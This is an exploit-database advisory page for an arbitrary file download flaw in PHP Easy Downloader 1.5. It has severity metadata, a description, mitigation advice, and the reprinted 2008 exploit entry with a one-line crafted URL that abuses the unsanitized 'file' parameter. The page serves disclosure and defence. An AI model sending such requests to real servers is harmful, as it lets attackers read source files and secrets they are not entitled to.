header-logo
Suggest Exploit
vendor:
PHP Easy Downloader
by:
LMaster
7.5
CVSS
HIGH
Remote File Download
434
CWE
Product Name: PHP Easy Downloader
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: a:phpeasydownloader:phpeasydownloader:1.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP Easy Downloader <= 1.5 Remote File Download

A vulnerability in PHP Easy Downloader <= 1.5 allows an attacker to download arbitrary files from the server. This is done by sending a specially crafted HTTP request to the vulnerable server. The request contains the file parameter which specifies the file to be downloaded. The file parameter is not properly sanitized, allowing an attacker to download any file from the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of PHP Easy Downloader.
Source

Exploit-DB raw data:

::::::::::::::::::::R3AL.RU::::::::::::::::::::

PHP Easy Downloader <= 1.5 Remote File Download

Author: LMaster

Greetz: Pogozheva Irina Borisovna and r3al.ru

Download:

http://www.hasemithut.de/downloads/index.php

Exploit:

http://www.target.com/phpeasydownloader/index.php?file=index.php

# milw0rm.com [2008-10-16]

Navigation

Suggest Exploit

Services By CQR